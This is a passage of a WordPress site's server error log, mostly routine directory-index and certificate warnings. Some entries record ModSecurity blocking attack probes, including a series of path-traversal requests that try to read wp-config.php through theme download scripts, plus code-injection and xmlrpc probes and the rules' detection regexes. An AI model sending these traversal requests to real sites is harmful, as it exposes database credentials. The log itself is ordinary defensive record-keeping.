(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jan 11 00:09:13.383404 2023] [autoindex:error] [pid 2217:tid 140559876269824] [client 74.208.212.214:48068] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jan 11 00:10:03.888805 2023] [autoindex:error] [pid 2112:tid 140560018945792] [client 74.208.212.214:48144] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jan 11 00:10:07.386579 2023] [autoindex:error] [pid 2111:tid 140559951804160] [client 74.208.212.214:48146] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2023/01/11 00:12:46 [error] 2491#2491: *23966 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 74.208.212.214, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2023/01/11 00:12:53 [error] 2490#2490: *23973 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 74.208.212.214, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2023/01/11 00:16:15 [error] 2491#2491: *24069 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 74.208.212.214, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" 2023/01/11 00:16:24 [error] 2491#2491: *24076 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 74.208.212.214, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Wed Jan 11 00:16:28.410485 2023] [autoindex:error] [pid 2113:tid 140560052516608] [client 74.208.212.214:48358] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jan 11 00:16:32.075131 2023] [autoindex:error] [pid 2112:tid 140560052516608] [client 74.208.212.214:48364] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jan 11 03:30:30.622072 2023] [ssl:warn] [pid 20321:tid 140709331376000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 11 03:30:30.756972 2023] [ssl:warn] [pid 20322:tid 140709331376000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 11 03:30:31.084661 2023] [ssl:warn] [pid 20322:tid 140709331376000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 11 03:30:32.770975 2023] [ssl:warn] [pid 20322:tid 140709331376000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 11 03:30:36.314565 2023] [ssl:warn] [pid 20769:tid 140101079934848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 11 03:30:36.428239 2023] [ssl:warn] [pid 20770:tid 140101079934848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 11 10:34:16.866431 2023] [ssl:warn] [pid 20770:tid 140101079934848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 11 11:10:08.440029 2023] [ssl:warn] [pid 20770:tid 140101079934848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 11 11:11:36.422498 2023] [ssl:warn] [pid 20770:tid 140101079934848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 12 00:07:41.638213 2023] [:error] [pid 21073:tid 140100625135360] [client 152.89.196.13:56264] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/class-wordpress-license.php"] [unique_id "Y7-Vnc99ogm5ZKGLHuV3NwAAAFg"] [Thu Jan 12 02:55:39.006211 2023] [autoindex:error] [pid 21180:tid 140100784596736] [client 74.208.212.214:34450] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 12 02:55:59.286518 2023] [autoindex:error] [pid 21074:tid 140100784596736] [client 74.208.212.214:34456] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 12 02:56:04.122493 2023] [autoindex:error] [pid 21074:tid 140100683884288] [client 74.208.212.214:34464] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 12 02:56:06.013314 2023] [autoindex:error] [pid 21072:tid 140100700669696] [client 74.208.212.214:34466] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 12 02:57:21.786549 2023] [autoindex:error] [pid 21072:tid 140100776204032] [client 74.208.212.214:34538] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 12 02:57:25.788590 2023] [autoindex:error] [pid 21074:tid 140100709062400] [client 74.208.212.214:34544] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2023/01/12 03:00:19 [error] 20623#20623: *76586 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 74.208.212.214, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2023/01/12 03:00:24 [error] 20623#20623: *76590 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 74.208.212.214, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2023/01/12 03:04:38 [error] 20623#20623: *76725 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 74.208.212.214, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" 2023/01/12 03:04:45 [error] 20623#20623: *76729 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 74.208.212.214, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Thu Jan 12 03:04:51.039966 2023] [autoindex:error] [pid 21180:tid 140100667098880] [client 74.208.212.214:34852] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 12 03:04:54.452315 2023] [autoindex:error] [pid 21074:tid 140100692276992] [client 74.208.212.214:34854] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 12 03:43:23.070017 2023] [ssl:warn] [pid 30577:tid 140199663146880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 12 03:43:23.223183 2023] [ssl:warn] [pid 30578:tid 140199663146880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 12 03:43:23.438092 2023] [ssl:warn] [pid 30578:tid 140199663146880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 12 03:43:25.158372 2023] [ssl:warn] [pid 30578:tid 140199663146880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 12 03:43:27.598916 2023] [ssl:warn] [pid 31023:tid 140315586119552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 12 03:43:27.707075 2023] [ssl:warn] [pid 31024:tid 140315586119552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 12 06:45:10.925711 2023] [:error] [pid 31476:tid 140315163813632] [client 5.188.62.174:47984] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7_yxqGMrWzzUVMdEhfnNgAAANQ"] [Thu Jan 12 12:15:11.438386 2023] [autoindex:error] [pid 31041:tid 140315230955264] [client 50.62.30.223:33198] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-admin/js/widgets/index.php [Thu Jan 12 12:15:13.207551 2023] [autoindex:error] [pid 31476:tid 140315147028224] [client 51.210.25.137:33210] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-admin/js/widgets/index.php [Thu Jan 12 18:51:37.455069 2023] [autoindex:error] [pid 31041:tid 140315247740672] [client 95.217.182.163:49842] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-admin/js/widgets/index.php [Thu Jan 12 20:41:22.636918 2023] [autoindex:error] [pid 31041:tid 140315247740672] [client 43.135.166.57:56184] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Jan 12 21:29:10.640652 2023] [:error] [pid 31476:tid 140315130242816] [client 5.188.62.76:58672] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y8DB9qGMrWzzUVMdEhcCZQAAANg"] [Fri Jan 13 00:49:36.353659 2023] [:error] [pid 31476:tid 140315147028224] [client 185.206.224.212:42556] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/down.php"] [unique_id "Y8Dw8KGMrWzzUVMdEhcLjgAAANY"] [Fri Jan 13 00:49:36.468405 2023] [:error] [pid 31042:tid 140315298096896] [client 185.206.224.212:42560] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/download.php"] [unique_id "Y8Dw8I6vAq65Ygpdg5ObHwAAAEQ"] [Fri Jan 13 00:49:36.582753 2023] [:error] [pid 31042:tid 140315256133376] [client 185.206.224.212:42562] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/download/download.php"] [unique_id "Y8Dw8I6vAq65Ygpdg5ObIAAAAEk"] [Fri Jan 13 00:49:36.711595 2023] [:error] [pid 31043:tid 140315298096896] [client 185.206.224.212:42564] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/inc/download.php"] [unique_id "Y8Dw8Mx9A9c0KkSpLadP5gAAAIQ"] [Fri Jan 13 00:49:36.828333 2023] [:error] [pid 31476:tid 140315264526080] [client 185.206.224.212:42566] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/includes/view-pdf.php?download=1&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/includes/view-pdf.php"] [unique_id "Y8Dw8KGMrWzzUVMdEhcLjwAAAMg"] [Fri Jan 13 00:49:36.943246 2023] [:error] [pid 31041:tid 140315256133376] [client 185.206.224.212:42568] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/lib/scripts/download.php"] [unique_id "Y8Dw8MPRCDYHCWWhHpAjlQAAAAk"] [Fri Jan 13 00:49:37.059743 2023] [:error] [pid 31476:tid 140315239347968] [client 185.206.224.212:42570] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/includes/download.php"] [unique_id "Y8Dw8aGMrWzzUVMdEhcLkAAAAMs"] [Fri Jan 13 00:49:37.174781 2023] [:error] [pid 31041:tid 140315205777152] [client 185.206.224.212:42572] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/lib/downloadlink.php"] [unique_id "Y8Dw8cPRCDYHCWWhHpAjlgAAAA8"] [Fri Jan 13 00:49:37.294185 2023] [:error] [pid 31043:tid 140315205777152] [client 185.206.224.212:42574] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/functions/download.php"] [unique_id "Y8Dw8cx9A9c0KkSpLadP5wAAAI8"] [Fri Jan 13 00:49:37.409603 2023] [:error] [pid 31042:tid 140315180599040] [client 185.206.224.212:42576] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/download.php"] [unique_id 